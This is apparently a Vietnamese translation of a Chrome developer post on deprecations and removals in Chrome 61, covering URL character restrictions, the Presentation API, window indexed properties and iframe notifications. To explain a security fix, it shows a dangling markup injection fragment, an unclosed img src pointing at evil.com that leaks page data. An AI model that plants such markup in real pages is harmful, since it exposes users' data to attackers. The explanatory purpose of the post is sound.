Ngừng sử dụng và xoá trong Chrome 61

Liên khúc Joe
Joe Medley

Trong hầu hết mọi phiên bản Chrome, chúng tôi nhận thấy nhiều nội dung cập nhật và cải tiến đáng kể đối với sản phẩm, hiệu suất cũng như các khả năng của Nền tảng web. Bài viết này mô tả việc ngừng sử dụng và xoá khỏi Chrome 61 (đang trong giai đoạn thử nghiệm beta kể từ ngày 3 tháng 8). Danh sách này có thể thay đổi bất cứ lúc nào.

Bảo mật và quyền riêng tư

Chặn tài nguyên có URL chứa ký tự "\n" và "<"

Có một loại tấn công được gọi là chèn mã đánh dấu lơ lửng, trong đó một URL bị cắt bớt được dùng để gửi dữ liệu đến điểm cuối bên ngoài. Ví dụ: hãy xem xét một trang có chứa <img src='https://evil.com/?. Vì URL không có dấu ngoặc kép đóng, nên các trình duyệt sẽ đọc dấu ngoặc kép tiếp theo xuất hiện và xử lý các ký tự trong ngoặc như thể đó là một URL.

Chrome 61 giảm thiểu lỗ hổng bảo mật này bằng cách hạn chế bộ ký tự được phép trong các thuộc tính hrefsrc. Cụ thể, Chrome sẽ ngừng xử lý URL khi gặp các ký tự dòng mới (\n) và nhỏ hơn ký tự (<).

Nhà phát triển có trường hợp sử dụng hợp pháp đối với dòng mới và có ít ký tự hơn trong một URL nên tránh các ký tự này.

Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium

Ngừng sử dụng và xoá API Bản trình bày trong bối cảnh không an toàn

Chúng tôi phát hiện thấy rằng đối với các nguồn gốc không an toàn, API Bản trình bày có thể được dùng làm vectơ xâm nhập trên các nguồn gốc không an toàn. Vì màn hình không có thanh địa chỉ nên API có thể được dùng để giả mạo nội dung. Bạn cũng có thể đánh cắp dữ liệu khi chạy bản trình bày.

Căn cứ theo ý định của Blink về việc xoá các tính năng mạnh mẽ trên các nguồn gốc không an toàn, chúng tôi dự định sẽ ngừng sử dụng và ngừng hỗ trợ API Bản trình bày đối với các bối cảnh không an toàn. Kể từ Chrome 61, PresentationRequest.start() sẽ không còn hoạt động trên các nguồn gốc không an toàn.

Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium

JavaScript

Không cho phép xác định các thuộc tính được lập chỉ mục trên cửa sổ

Trước đây, một số trình duyệt cho phép gán JavaScript như sau:

    window[0] = 1;

Ghi chú về thông số kỹ thuật HTML hiện tại cho rằng đây là hành vi vi phạm rõ ràng quy cách của JavaScript. Do đó, khả năng này sẽ bị loại bỏ trong Chrome 61. Kể từ tháng 2 năm 2016, Firefox đã tuân thủ.

Lỗi Chromium

Loại bỏ việc sử dụng thông báo khỏi iframe không an toàn

Các yêu cầu cấp quyền từ iframe có thể khiến người dùng nhầm lẫn vì khó phân biệt giữa nguồn của trang chứa và nguồn của iframe đưa ra yêu cầu. Khi phạm vi yêu cầu không rõ ràng, người dùng sẽ khó đánh giá liệu nên cấp hay từ chối cấp quyền.

Việc không cho phép thông báo trong iframe cũng sẽ điều chỉnh các yêu cầu về quyền gửi thông báo với thông báo đẩy, giảm bớt sự phiền hà cho nhà phát triển.

Các nhà phát triển cần chức năng này có thể mở một cửa sổ mới để yêu cầu quyền gửi thông báo.

Ý định xoá | Trình theo dõi trạng thái Chrome | Lỗi Chromium